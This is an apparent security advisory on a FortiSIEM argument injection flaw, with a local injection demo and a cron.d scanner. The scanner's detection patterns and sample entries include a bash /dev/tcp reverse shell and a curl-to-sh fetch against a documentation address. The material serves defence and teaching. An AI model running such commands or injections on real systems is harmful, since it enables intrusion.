CVE-2025-64155: Unauthenticated Argument Injection in Fortinet FortiSIEM Leading to Remote Code Execution

Executive Summary
CVE-2025-64155 is a critical vulnerability in Fortinet FortiSIEM that lets an unauthenticated remote attacker execute arbitrary code through an argument injection flaw in the phMonitor service. Discovered by researchers at Horizon3, the vulnerability chains unauthenticated access to phMonitor command handlers, improper input handling, script execution, and an arbitrary file write to obtain code execution as the admin user, and then escalates to root through cron job manipulation.
On January 14, 2026, Horizon3 published a detailed technical writeup and a proof-of-concept (PoC) exploit on GitHub that demonstrates the full exploitation chain end to end. This report incorporates an independent recreation and step-by-step breakdown of the Horizon3 PoC, explaining the mechanics behind the argument injection and the resulting code execution.
Given the ease of exploitation and the history of Fortinet products being targeted in the wild (64 Fortinet CVEs are listed in CISA's Known Exploited Vulnerabilities catalog), immediate patching is strongly recommended.
Background
FortiSIEM serves as Fortinet's Security Information and Event Management solution, providing log collection, correlation, automated response, and remediation capabilities. The platform processes security events across enterprise environments, making it a high-value target for attackers seeking to compromise security monitoring infrastructure.
Previous phMonitor vulnerabilities, such as CVE-2024-23108 and CVE-2023-34992, exposed similar unauthenticated command injection paths. The recurrence points to systemic weaknesses in input validation and authentication within the phMonitor service.
Vulnerability Details
The core issue lies in how the phMonitor service handles HTTP requests. The service exposes multiple command handlers that process incoming requests without requiring authentication, and because those handlers do not adequately sanitize their inputs, an attacker can inject additional arguments into the system commands they build.
The exploitation chain proceeds in stages. First, the attacker sends a crafted HTTP request to the phMonitor service on port 7900, targeting a command handler that accepts user-controlled input. Because that input is not validated before it is placed on a command line, the attacker can append extra parameters that change what the command does.
In this case the injected arguments let the attacker write attacker-controlled content to a file location of their choosing. Targeting cron directories or other system configuration files turns that write into code execution. The initial execution context is the admin user, which has sufficient privileges to modify system cron jobs; that is the step used to escalate to root.
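The pattern described above, as an added, generic illustration (this is not phMonitor code, not nfs-test.py, and not the Horizon3 PoC): a handler that takes a "host" value from a request, concatenates it into a command line and word-splits it, so tokens inside the value become extra arguments that the invoked script's own option parser honours. The stub script, its --result-file option and the 10.0.0.5 payload are all constructed for the example. The hardened variant shows the three fixes a reviewer would ask for: an allow-list on the value, a single argv element with no string building, and a "--" separator so a value beginning with "-" can never be read as an option.

```python
import os
import re
import shlex
import subprocess
import sys
import tempfile

# Constructed stand-in for a helper script that a monitoring handler might
# invoke. It is NOT FortiSIEM's nfs-test.py or any phMonitor code; it only
# reproduces the shape of the bug: a positional target plus an option that
# selects an output file, i.e. a file-write sink reachable through argv.
STUB_SCRIPT = r'''
import argparse, sys
p = argparse.ArgumentParser()
p.add_argument("host")
p.add_argument("--result-file", help="append the result line to this file")
a = p.parse_args()
line = "ping host=%s status=up\n" % a.host
if a.result_file:
    with open(a.result_file, "a") as f:   # the sink an injected option reaches
        f.write(line)
else:
    sys.stdout.write(line)
'''

_tmp = tempfile.NamedTemporaryFile("w", suffix=".py", delete=False)
_tmp.write(STUB_SCRIPT)
_tmp.close()
STUB_PATH = _tmp.name

# Allow-list for the one value the handler should accept: a hostname or a
# dotted IPv4 address. (IPv6 is deliberately out of scope for this example.)
HOST_RE = re.compile(
    r"^(?=.{1,253}$)[A-Za-z0-9]([A-Za-z0-9-]*[A-Za-z0-9])?"
    r"(\.[A-Za-z0-9]([A-Za-z0-9-]*[A-Za-z0-9])?)*$"
)


def run_vulnerable(host):
    """Argument injection: the request value is concatenated into a command
    string and then word-split, so every token inside it becomes a separate
    argv entry and the script's option parser sees the injected option."""
    cmd = "%s %s %s" % (shlex.quote(sys.executable), shlex.quote(STUB_PATH), host)
    return subprocess.run(shlex.split(cmd), capture_output=True, text=True)


def run_hardened(host):
    """Same call, hardened three ways: allow-list the value, pass it as one
    argv element (no word splitting), and end option parsing with "--" so
    even a value beginning with "-" is taken as the positional argument."""
    if not HOST_RE.match(host):
        raise ValueError("rejected host value: %r" % host)
    argv = [sys.executable, STUB_PATH, "--", host]
    return subprocess.run(argv, capture_output=True, text=True)


def demo():
    """Runs both variants against a constructed payload that smuggles a
    --result-file option after the host, and reports what each one did."""
    workdir = tempfile.mkdtemp(prefix="arginj-")
    target = os.path.join(workdir, "dropped.txt")   # stands in for a cron.d path
    payload = "10.0.0.5 --result-file %s" % target  # constructed attacker value

    run_vulnerable(payload)
    vulnerable_wrote = os.path.exists(target)
    if vulnerable_wrote:
        os.remove(target)

    try:
        run_hardened(payload)
        hardened_wrote = os.path.exists(target)
    except ValueError:
        hardened_wrote = False

    normal = run_hardened("10.0.0.5").stdout.strip()
    return {
        "vulnerable_wrote_file": vulnerable_wrote,
        "hardened_wrote_file": hardened_wrote,
        "hardened_normal_output": normal,
    }


if __name__ == "__main__":
    print(demo())
```

The vulnerable path writes the file even though the handler never intended to expose --result-file; the hardened path rejects the payload at the allow-list and, for a legitimate host, still produces the expected output. Note that no shell metacharacters are involved: this is purely the invoked program's argv being extended, which is what distinguishes argument injection from command injection.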
Technical Analysis
The phMonitor service implements a custom HTTP server that routes requests to a set of command handlers. Analysis of the binary shows that several handlers take parameters directly from request bodies without validating them.
The vulnerable code path runs through the storePingResult handler, which processes network monitoring data. The handler extracts parameters from the request and passes them to internal functions that ultimately execute system commands. By injecting additional arguments into that command line, an attacker can redirect the command's output to an arbitrary file.
The exploit leverages the nfs-test.py script, which phMonitor can invoke. By manipulating the arguments passed to this script, the attacker writes attacker-controlled content into the cron.d directory, scheduling a malicious command for execution.
Proof of Concept Breakdown
The Horizon3 PoC demonstrates the complete exploitation chain:
- The exploit sends an HTTP POST request to port 7900 targeting the vulnerable handler
- The request body contains crafted parameters that exploit the argument injection flaw
- The injected arguments cause the system to write a malicious cron entry
- The cron daemon executes the attacker's payload within one minute
- The payload establishes a reverse shell or executes arbitrary commands as root
The PoC achieves root access by writing to /etc/cron.d/, where files are automatically parsed by the cron daemon. The written file contains a schedule entry that executes a reverse shell command, providing the attacker with interactive root access to the compromised system.
Impact Assessment
The vulnerability carries a CVSS score of 10.0 (Critical), reflecting the combination of:
- Network-based attack vector requiring no authentication
- Low attack complexity with no user interaction required
- Complete compromise of confidentiality, integrity, and availability
- Potential for lateral movement within enterprise environments
Organizations running vulnerable FortiSIEM versions face risk of complete security monitoring infrastructure compromise, potentially allowing attackers to operate undetected while manipulating security event data.
Mitigation
Fortinet has released patches addressing this vulnerability. Organizations should update immediately to FortiSIEM version 7.1.3 or later. Where patching cannot happen immediately, restrict access to the phMonitor service port (TCP 7900) to authorized management systems through network segmentation; the service should not be reachable from untrusted networks.
Additional defensive measures include monitoring for unexpected cron job modifications (new or changed files under /etc/cron.d in particular), egress filtering that blocks and alerts on outbound connections the appliance has no reason to make (the PoC's reverse shell depends on one), and reviewing FortiSIEM logs for evidence of exploitation attempts.
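One way to act on the cron monitoring advice above, as an added example that is not part of the original report or of any Fortinet tooling: parse files in the /etc/cron.d format (schedule, user, command, with SHELL=/PATH= assignments and comments skipped) and report jobs whose command matches reverse-shell or download-and-execute indicators, adding the user and an every-minute schedule as context so an entry like the one the PoC drops sorts to the top of a review. The indicator list, the sample cron.d content and the 192.0.2.10 address are all constructed for the example; scan_cron_dir() runs the same check against a live directory.

```python
import os
import re

# Indicators typical of reverse-shell or download-and-execute one-liners
# (a constructed, deliberately short list; tune it for your environment).
REVERSE_SHELL_PATTERNS = [re.compile(p) for p in (
    r"/dev/tcp/",
    r"\bbash\s+-i\b",
    r"\b(nc|ncat|netcat)\b.*\s-e\s",
    r"\bsocat\b.*\bexec\b",
    r"\bmkfifo\b",
    r"\bpython[23]?\b.*\bsocket\b",
    r"\b(curl|wget)\b.*\|\s*(ba|z)?sh\b",
    r"\bbase64\s+(-d|--decode)\b",
)]

# /etc/cron.d line: schedule (five fields or an @keyword), user, command.
CRON_LINE_RE = re.compile(r"^(@\w+|(?:\S+\s+){4}\S+)\s+(\S+)\s+(.+?)\s*$")
ENV_LINE_RE = re.compile(r"^\w+=")


def parse_cron_d(text):
    """Yields (lineno, schedule, user, command) for each job line."""
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#") or ENV_LINE_RE.match(line):
            continue  # blank, comment, or SHELL=/PATH=/MAILTO= assignment
        m = CRON_LINE_RE.match(line)
        if m:
            yield lineno, m.group(1), m.group(2), m.group(3)


def runs_every_minute(schedule):
    """True for a minute field of "*" or "*/1", the cadence a dropped
    reverse-shell job typically uses so it fires within a minute."""
    return not schedule.startswith("@") and schedule.split()[0] in ("*", "*/1")


def scan_cron_file(name, text):
    """Returns findings for jobs whose command matches an indicator. The
    user and schedule are recorded as extra reasons for triage ordering."""
    findings = []
    for lineno, schedule, user, command in parse_cron_d(text):
        hits = [p.pattern for p in REVERSE_SHELL_PATTERNS if p.search(command)]
        if not hits:
            continue
        reasons = ["reverse_shell_indicator"]
        if user == "root":
            reasons.append("runs_as_root")
        if runs_every_minute(schedule):
            reasons.append("every_minute")
        findings.append({
            "file": name, "line": lineno, "user": user, "schedule": schedule,
            "command": command, "reasons": reasons, "matched": hits,
        })
    return findings


def scan_cron_dir(path="/etc/cron.d"):
    """Scans every regular file in a cron.d directory on a live host."""
    out = []
    for entry in sorted(os.listdir(path)):
        full = os.path.join(path, entry)
        if os.path.isfile(full):
            with open(full, errors="replace") as f:
                out.extend(scan_cron_file(full, f.read()))
    return out


# Constructed sample: two benign lines plus two planted jobs. 192.0.2.10 is
# a documentation-range address, not a real listener.
SAMPLE_CRON_D = """\
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
# nightly log rotation
0 2 * * * root /usr/local/bin/rotate-logs.sh
* * * * * root bash -i >& /dev/tcp/192.0.2.10/4444 0>&1
*/1 * * * * admin curl -s http://192.0.2.10/s | sh
"""

if __name__ == "__main__":
    for f in scan_cron_file("sample", SAMPLE_CRON_D):
        print("%s:%d %s %r %s -> %s" % (
            f["file"], f["line"], f["user"], f["schedule"], f["reasons"], f["command"]))
```

Pair this with a file-integrity or audit rule on /etc/cron.d so the scan is triggered on change rather than on a timer; a job that runs every minute has already fired by the time a periodic scan notices it. The legitimate nightly entry is deliberately not reported, so the check stays quiet on a normal appliance.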